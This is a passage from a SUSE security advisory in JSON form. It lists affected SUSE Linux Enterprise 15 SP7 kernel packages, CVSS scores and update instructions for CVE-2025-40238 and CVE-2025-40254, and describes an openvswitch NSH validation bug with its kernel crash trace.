"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40238",
"url": "https://www.suse.com/security/cve/CVE-2025-40238"
},
{
"category": "external",
"summary": "SUSE Bug 1254871 for CVE-2025-40238",
"url": "https://bugzilla.suse.com/1254871"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-40238"
},
{
"cve": "CVE-2025-40254",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40254"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: openvswitch: remove never-working support for setting nsh fields\n\nThe validation of the set(nsh(...)) action is completely wrong.\nIt runs through the nsh_key_put_from_nlattr() function that is the\nsame function that validates NSH keys for the flow match and the\npush_nsh() action. However, the set(nsh(...)) has a very different\nmemory layout. Nested attributes in there are doubled in size in\ncase of the masked set(). That makes proper validation impossible.\n\nThere is also confusion in the code between the \u0027masked\u0027 flag, that\nsays that the nested attributes are doubled in size containing both\nthe value and the mask, and the \u0027is_mask\u0027 that says that the value\nwe\u0027re parsing is the mask. This is causing kernel crash on trying to\nwrite into mask part of the match with SW_FLOW_KEY_PUT() during\nvalidation, while validate_nsh() doesn\u0027t allocate any memory for it:\n\n BUG: kernel NULL pointer dereference, address: 0000000000000018\n #PF: supervisor read access in kernel mode\n #PF: error_code(0x0000) - not-present page\n PGD 1c2383067 P4D 1c2383067 PUD 20b703067 PMD 0\n Oops: Oops: 0000 [#1] SMP NOPTI\n CPU: 8 UID: 0 Kdump: loaded Not tainted 6.17.0-rc4+ #107 PREEMPT(voluntary)\n RIP: 0010:nsh_key_put_from_nlattr+0x19d/0x610 [openvswitch]\n Call Trace:\n \u003cTASK\u003e\n validate_nsh+0x60/0x90 [openvswitch]\n validate_set.constprop.0+0x270/0x3c0 [openvswitch]\n __ovs_nla_copy_actions+0x477/0x860 [openvswitch]\n ovs_nla_copy_actions+0x8d/0x100 [openvswitch]\n ovs_packet_cmd_execute+0x1cc/0x310 [openvswitch]\n genl_family_rcv_msg_doit+0xdb/0x130\n genl_family_rcv_msg+0x14b/0x220\n genl_rcv_msg+0x47/0xa0\n netlink_rcv_skb+0x53/0x100\n genl_rcv+0x24/0x40\n netlink_unicast+0x280/0x3b0\n netlink_sendmsg+0x1f7/0x430\n ____sys_sendmsg+0x36b/0x3a0\n ___sys_sendmsg+0x87/0xd0\n __sys_sendmsg+0x6d/0xd0\n do_syscall_64+0x7b/0x2c0\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\nThe third issue with this process is that while trying to convert\nthe non-masked set into masked one, validate_set() copies and doubles\nthe size of the OVS_KEY_ATTR_NSH as if it didn\u0027t have any nested\nattributes. It should be copying each nested attribute and doubling\nthem in size independently. And the process must be properly reversed\nduring the conversion back from masked to a non-masked variant during\nthe flow dump.\n\nIn the end, the only two outcomes of trying to use this action are\neither validation failure or a kernel crash. And if somehow someone\nmanages to install a flow with such an action, it will most definitely\nnot do what it is supposed to, since all the keys and the masks are\nmixed up.\n\nFixing all the issues is a complex task as it requires re-writing\nmost of the validation code.\n\nGiven that and the fact that this functionality never worked since\nintroduction, let\u0027s just remove it altogether. It\u0027s better to\nre-introduce it later with a proper implementation instead of trying\nto fix it in stable releases.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40254",
"url": "https://www.suse.com/security/cve/CVE-2025-40254"
},
{
"category": "external",
"summary": "SUSE Bug 1254852 for CVE-2025-40254",
"url": "https://bugzilla.suse.com/1254852"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
